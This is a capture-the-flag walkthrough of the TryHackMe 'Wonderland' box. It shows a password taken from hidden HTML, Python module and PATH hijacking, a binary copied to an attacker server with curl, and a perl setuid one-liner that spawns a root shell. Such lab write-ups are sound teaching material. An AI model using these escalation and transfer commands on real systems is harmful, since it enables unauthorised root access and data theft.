A medium Linux box from TryHackMe, get initial access by finding creds in site HTML, then escalate privilege through PATH vulnerabilities, and exploit an SUID binary for root


Running the standard nmap

sudo nmap -sC -sV -Pn -oA nmap/wonderland
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 8e:ee:fb:96:ce:ad:70:dd:05:a9:3b:0d:b0:71:b8:63 (RSA)
|   256 7a:92:79:44:16:4f:20:43:50:a9:a8:47:e2:c2:be:84 (ECDSA)
|_  256 00:0b:80:44:e6:3d:4b:69:47:92:2c:55:14:7e:2a:c9 (ED25519)
80/tcp open  http    Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-title: Follow the white rabbit.
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Navigating to the web page, just a static html page

Enumerating the directories with

gobuster dir -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -u

And find a directory “/r/”

Navigating to it, tells you to follow the rabbit, so just try it out, and spell rabbit using the url


And get to a special page, where it tells you to open the door

Inspecting the page, find some hidden creds - alice:HowDothTheLittleCrocodileImproveHisShiningTail

    <h1>Open the door and enter wonderland</h1>
    <p>"Oh, you’re sure to do that," said the Cat, "if you only walk long enough."</p>
    <p>Alice felt that this could not be denied, so she tried another question. "What sort of people live about here?"
    <p>"In that direction,"" the Cat said, waving its right paw round, "lives a Hatter: and in that direction," waving
        the other paw, "lives a March Hare. Visit either you like: they’re both mad."</p>
    <p style="display: none;">alice:HowDothTheLittleCrocodileImproveHisShiningTail</p>
    <img src="[/img/alice_door.png](view-source:" style="height: 50rem;">

SSH-ing into the box, get a shell as Alice

ssh alice@


In the home directory

alice@wonderland:~$ ls -la

drwxr-xr-x 5 alice alice 4096 May 25  2020 .
drwxr-xr-x 6 root  root  4096 May 25  2020 ..
lrwxrwxrwx 1 root  root     9 May 25  2020 .bash_history -> /dev/null
-rw-r--r-- 1 alice alice  220 May 25  2020 .bash_logout
-rw-r--r-- 1 alice alice 3771 May 25  2020 .bashrc
drwx------ 2 alice alice 4096 May 25  2020 .cache
drwx------ 3 alice alice 4096 May 25  2020 .gnupg
drwxrwxr-x 3 alice alice 4096 May 25  2020 .local
-rw-r--r-- 1 alice alice  807 May 25  2020 .profile
-rw------- 1 root  root    66 May 25  2020 root.txt
-rw-r--r-- 1 root  root  3577 May 25  2020 walrus_and_the_carpenter.py

Of note is the walrus_and_the_carpenter.py, further enumeration with sudo reveals that alice can run this python file as the “rabbit” user

sudo -l

User alice may run the following commands on wonderland:
    (rabbit) /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py

Looking at the python script, it imports the “random” library, and then prints random lines from a set of lines

Looking at the python library path list by running

alice@wonderland:~$ python3 -c "import sys;print(sys.path)"

['', '/usr/lib/python36.zip', '/usr/lib/python3.6', '/usr/lib/python3.6/lib-dynload', '/usr/local/lib/python3.6/dist-packages', '/usr/lib/python3/dist-packages']

The first item, ’ ‘, is the current directoy - so the file is susceptible to a path based vulnerability as a random.py file will first be looked for (and loaded from) the current directory, rather than the /usr/lib/python3.6/ directory where the actual file is

Creating a file to escalate to a “rabbit” user bash shell called random.py in the home directory

import os


Then run the script as the rabbit user with sudo

alice@wonderland:~$ sudo -u rabbit python3.6 /home/alice/walrus_and_the_carpenter.py 
rabbit@wonderland:~$ whoami

Now as rabbit, see a “teaParty” file with the SUID bit enabled in the rabbit home directory

rabbit@wonderland:/home/rabbit$ ./teaParty 
Welcome to the tea party!
The Mad Hatter will be here soon.
Probably by Sat, 10 Sep 2022 03:25:27 +0000
Ask very nicely, and I will give you some tea while you wait for him
rabbit@wonderland:/home/rabbit$ ls -la

-rw-r--r-- 1 rabbit rabbit   220 May 25  2020 .bash_logout
-rw-r--r-- 1 rabbit rabbit  3771 May 25  2020 .bashrc
-rw-r--r-- 1 rabbit rabbit   807 May 25  2020 .profile
-rwsr-sr-x 1 root   root   16816 May 25  2020 teaParty

Exfiltrate the file with curl PUT option

Start the PUT python server on the kali machine

python3 put-server.py --bind localhost 8000

Then exfiltrate from the victim

curl -T ./teaParty

Can dis-assemble with ghidra but I didn’t wanna download the 1.2Gb, so I just ran strings on the file and hoped for the best

strings ./teaParty

The Mad Hatter will be here soon.
/bin/echo -n 'Probably by ' && date --date='next hour' -R
Ask very nicely, and I will give you some tea while you wait for him

Can see that to output the message, teaParty runs the command “date” without using the full path - maybe its susceptible to another path vulnerability?

Looking at the PATH variable, see that you can add /tmp to the beginning of it with

export PATH=/tmp:$PATH

Now we can add a custom “date” binary that just gives us a further privileged shell as it will be found first in the PATH search

Then on the kali box, create date.c that launches a bash shell

#include <stdlib.h>

int main(){

Then compile

gcc date.c -o date

And then transfer the file to the victim and into the /tmp folder

Then run the teaParty executable to get a shell as “hatter”

Inside hatter’s home directory find a password.txt file, only containing the password of the “hatter” user unfortunately


SSH in as the hatter with the password again

Enumerating again from the beginning, see that this user can run perl with the SUID capability set

hatter@wonderland:/home/hatter$ getcap -r / 2>/dev/null

/usr/bin/perl5.26.1 = cap_setuid+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/perl = cap_setuid+ep

Using GTFObins, see a copy+paste solution to exploit the SUID capability

perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'

And get root!